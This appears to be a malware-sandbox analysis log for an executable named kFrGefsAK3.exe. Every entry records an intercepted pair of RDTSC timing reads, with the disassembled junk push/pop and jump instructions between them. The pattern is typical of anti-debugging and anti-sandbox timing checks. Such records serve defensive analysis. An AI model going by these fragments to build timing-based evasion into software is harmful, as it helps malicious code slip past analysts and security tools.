Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140770C second address: 1407716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14079C5 second address: 14079D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ecx 0x00000007 jmp 00007FA278C27B7Ah 0x0000000c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14079D6 second address: 14079DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B4B second address: 1407B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b je 00007FA278C27B76h 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B5D second address: 1407B63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B63 second address: 1407B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA278C27B76h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B6D second address: 1407B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B71 second address: 1407B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407B7A second address: 1407B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA278C0D016h 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407CFD second address: 1407D03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1407E8A second address: 1407E90 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1410887 second address: 141088D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 141088D second address: 1410896 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140E8E6 second address: 140E909 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B83h 0x00000007 jnp 00007FA278C27B82h 0x0000000d jp 00007FA278C27B76h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140EBB7 second address: 140EBBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140EBBF second address: 140EBC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140EBC5 second address: 140EBD0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140F6ED second address: 140F721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C27B88h 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jmp 00007FA278C27B86h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140F721 second address: 140F725 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140F9F0 second address: 140F9F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140F9F6 second address: 140FA06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007FA278C0D01Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140FCD9 second address: 140FCDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 140FCDD second address: 140FCE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14102E9 second address: 14102F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA278C27B76h 0x0000000a pop edx 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1413EDD second address: 1413EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA278C0D022h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1414068 second address: 141407E instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA278C27B76h 0x00000008 js 00007FA278C27B76h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 141407E second address: 1414082 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1414082 second address: 1414088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1414088 second address: 1414098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 jg 00007FA278C0D01Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1414098 second address: 14140B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C27B88h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14144C2 second address: 14144E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA278C0D021h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jnc 00007FA278C0D016h 0x00000011 popad 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14144E7 second address: 1414503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA278C27B83h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14146A0 second address: 14146A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1423340 second address: 1423345 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1423345 second address: 1423354 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA278C0D016h 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1423354 second address: 142335A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421A23 second address: 1421A27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421A27 second address: 1421A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421B73 second address: 1421B82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007FA278C0D016h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421B82 second address: 1421B8C instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA278C27B76h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421B8C second address: 1421B92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421B92 second address: 1421BA9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA278C27B89h 0x00000008 jmp 00007FA278C27B7Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421D0E second address: 1421D39 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D029h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jnp 00007FA278C0D016h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EB9 second address: 1421EBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EBD second address: 1421EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EC1 second address: 1421EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EC7 second address: 1421ECF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421ECF second address: 1421EF9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a jmp 00007FA278C27B80h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FA278C27B7Bh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421EF9 second address: 1421F18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D027h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 142205C second address: 1422062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1422062 second address: 1422066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1422066 second address: 1422093 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA278C27B76h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d ja 00007FA278C27B76h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FA278C27B86h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14221E4 second address: 14221FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D025h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1420FBF second address: 1421002 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA278C27B83h 0x00000008 jmp 00007FA278C27B7Bh 0x0000000d push edx 0x0000000e pop edx 0x0000000f jl 00007FA278C27B94h 0x00000015 jo 00007FA278C27B76h 0x0000001b jmp 00007FA278C27B88h 0x00000020 pop edx 0x00000021 pop eax 0x00000022 pushad 0x00000023 push ebx 0x00000024 pushad 0x00000025 popad 0x00000026 pop ebx 0x00000027 push ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1421002 second address: 142102B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FA278C0D030h 0x0000000b ja 00007FA278C0D016h 0x00000011 jmp 00007FA278C0D024h 0x00000016 push eax 0x00000017 push edx 0x00000018 push ecx 0x00000019 pop ecx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1433FF7 second address: 1433FFD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1433FFD second address: 143400B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA278C0D016h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143400B second address: 143400F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1434147 second address: 143414D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143414D second address: 1434151 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143BA93 second address: 143BA9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143BA9A second address: 143BAA9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA278C27B7Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 143BAA9 second address: 143BAB3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA278C0D016h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 144138F second address: 14413A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FA278C27B76h 0x0000000a popad 0x0000000b jl 00007FA278C27B82h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14413A2 second address: 14413A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14429D7 second address: 14429E5 instructions: 0x00000000 rdtsc 0x00000002 je 00007FA278C27B76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14429E5 second address: 14429EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14429EB second address: 1442A00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jnc 00007FA278C27B78h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1442A00 second address: 1442A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1442A08 second address: 1442A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA278C27B85h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14558D2 second address: 14558FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FA278C0D01Ch 0x0000000e push edi 0x0000000f pop edi 0x00000010 jmp 00007FA278C0D01Fh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455A0E second address: 1455A16 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455A16 second address: 1455A2E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007FA278C0D016h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007FA278C0D02Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455B69 second address: 1455B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455B6D second address: 1455B7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA278C0D01Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455FB9 second address: 1455FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA278C27B76h 0x0000000a jmp 00007FA278C27B7Ch 0x0000000f jmp 00007FA278C27B84h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1455FE4 second address: 1456001 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA278C0D01Ah 0x00000008 jmp 00007FA278C0D01Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456001 second address: 145600E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007FA278C27B7Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456C46 second address: 1456C55 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456C55 second address: 1456C6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA278C27B7Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456C6A second address: 1456C9B instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA278C0D016h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA278C0D01Fh 0x00000013 jmp 00007FA278C0D024h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 1456C9B second address: 1456C9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 145A6EB second address: 145A6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA278C0D016h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 145A87C second address: 145A880 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 149F0F8 second address: 149F0FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 149F0FE second address: 149F10B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 je 00007FA278C27B76h 0x0000000c pop esi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 149F10B second address: 149F116 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007FA278C0D016h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 149576B second address: 149576F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 149576F second address: 14957A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007FA278C0D035h 0x0000000f jne 00007FA278C0D01Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14957A7 second address: 14957AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14957AD second address: 14957B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FA278C0D016h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14AC885 second address: 14AC889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14AC889 second address: 14AC8AB instructions: 0x00000000 rdtsc 0x00000002 je 00007FA278C0D016h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b jmp 00007FA278C0D023h 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14AC43E second address: 14AC44B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA278C27B76h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 14AC44B second address: 14AC452 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\kFrGefsAK3.exe RDTSC instruction interceptor: First address: 157A1EE second address: 157A1F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FA278C27B76h 0x0000000a rdtsc
